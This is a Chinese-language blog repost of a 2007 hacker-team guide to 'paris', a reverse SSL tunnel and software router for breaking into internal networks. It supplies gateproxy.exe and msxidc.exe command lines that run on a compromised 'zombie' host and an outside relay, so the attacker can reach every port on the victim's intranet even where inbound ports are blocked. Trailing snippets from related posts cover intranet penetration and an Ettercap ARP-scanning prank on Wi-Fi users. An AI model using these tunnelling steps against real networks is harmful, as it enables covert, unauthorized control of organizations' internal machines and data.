Paris讓你在內網滲透中事半功倍

2021-04-13 14:46:22 字數 2324 閱讀 5868

首發:**八進位制資訊保安團隊(www.eviloctal.com)

paris/0.2.1 (01/14/2007)

研究成果:

www.rootkit.com.cn

www.horseb.org

此工具能夠讓你在內網滲透中事半功倍.讓你的計算機屬於對方內網的狀態。

使用方法:

目前流行的httptunnel其實還屬於正向隧道,有windows os的防火牆或ipsec埠過濾比較嚴格的話,沒辦法使用,而且現在的通道除了vpn比較可靠安全,其他都不可靠。

paris經過使用比較安全可靠

目前主要有下面的用法:

1.入侵內網時,在能占領的出口或**主機上執行softrouter,外網softrouter server 可以關聯內網主機這樣在外網就很方便的控制內網主機。

2. 如果內網有一些有特殊應用服務的主機,但是不能通過公司的路由器配置對映到外網的,這裡可以通過這個軟體把相應埠對映到外網,這樣外網就可以使用內網上某些資源,比如web站點。

使用paris 建立 vpn方法:

如何建立vpn

1。方案

在202.106.0.202# gateproxy.exe-p2380 stls=fcl server=socks

在192.168.1.12# gateproxy.exe -p1100 stls=fsv server=socks socks=202.106.0.202:2380

內網ip 192.168.1.12

肉雞ip 202.106.0.202

如果肉雞的埠能正向連線的話可以做的

先在肉雞上執行在202.106.0.202# gateproxy.exe-p2380 stls=fcl server=socks

然後再在自己的機器上執行gateproxy.exe -p1100 stls=fsv server=socks socks=202.106.0.202:2380

這樣你的網路192.168.1.12 就可以訪問 202.106.0.202 這台機器對應的內網的所有機器的所有埠了

2.方案2

在202.106.0.202# gateproxy.exe-p2380 stls=fcl server=socks

在202.106.0.202# msxidc.exe -l127.0.0.1 -p2380 -m99 -s218.155.0.1 -r9001

在192.168.1.12# gateproxy.exe -p1100 stls=fsv server=socks socks=218.155.0.1:99

這裡說明一下,這裡的msxidc.exe程式是rootkit.com.cn 的軟體路由程式

這裡是為了解決肉雞ip 202.106.0.202封正向埠的情況的,如果肉雞ip 202.106.0.202:2380埠

連不上的話,就要用msxidc.exe把202.106.0.202:2380轉到218.155.0.1:99的埠上,我們連線

218.155.0.1:99就等於連線上了肉雞ip 202.106.0.202:2380了,這樣就通過218.155.0.1:99埠

中轉建立了和肉雞202.106.0.202:2380的ssl vpn了

這裡的218.155.0.1:9001 是softrouter的另外乙個**的偵聽服務的埠

注意:這裡必須要按照以上命令序列執行,否則不能連線上

附軟體路由器的其他使用語法:

$$$$$$$$$$ software router version 0.01 $$$$$$$$$$$$$$

msxidc -lvim_ip -pvimhost_port -mmap_msvidcs_port -**svidcs_ip -rmsvidcs_port

example:msxidc -l10.0.0.1 -p1433 -m99 -s218.155.0.1 -r9001

內網要連到外面的主機 10.0.0.1 這台內網主機要提供給外網的服務埠 1433 在外網上對映成的埠99 外網softrouterserver 的ip218.155.0.1 外網softrouterserver 的port 9001

這樣我們就能在外網訪問 218.155.0.1:99 就隨時訪問內網的 10.0.0.1:1433

msxidc -mmap_msvidcs_port -**svidcs_ip -rmsvidcs_port

example:msxidc -m99 -s218.155.0.1 -r9001

msxidc -plocalhost_port -xmap_msvidcs_port -ymsvidcs_ip -zmsvidcs_port

example:msxidc -p1433 -x99 -y218.155.0.1 -z9001

內網滲透 內網滲透測試基礎 1

內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...

再談內網滲透

前言 看了 g.r0b1n文章 內網滲透 抑制不住自己衝動的心情,寫一篇 再談內網滲透 希望以後有朋友能更新 詳談內網滲透 在我的腦子裡面我始終認為,一次滲透至少要控制被滲透物件80 以上伺服器才能算得上一次成功的滲透。希望朋友們能夠多提寶貴意見。正文 我沒有內網域裡面某個機器的許可權,我只有乙個存...

Ettercap內網滲透

最近網速很卡,於是想到有人在蹭網,怎麼捉弄一下呢?1 開啟ettercap ettercap g 2 hosts scan,list 發現有幾個新的位址192.168.1.71,192.168.1.72,我的192.168.1.35 3 在hostlist中,選擇閘道器 192.168.1.1 右鍵...